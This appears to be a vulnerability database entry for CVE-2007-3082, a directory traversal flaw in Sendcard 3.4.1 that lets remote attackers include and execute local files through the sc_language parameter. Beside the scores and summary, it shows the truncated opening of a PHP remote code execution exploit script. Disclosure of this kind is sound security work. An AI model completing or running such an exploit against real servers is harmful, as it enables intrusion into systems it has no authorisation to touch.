7.8
CVSSv2

CVE-2007-3082

Published: 06/06/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Vulnerability Summary

Directory traversal vulnerability in sendcard.php in Sendcard 3.4.1 and previous versions allows remote malicious users to include and execute arbitrary local files via a .. (dot dot) in the sc_language parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sendcard sendcard

Exploits

#!/usr/bin/php -q -d short_open_tag=on <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); if ($argc<4) { print "-------------------------------------------------------------------------\r\n"; print " Sendcard <= 341 Remote Code Execution Exploit\r\n"; print "--------------------- ...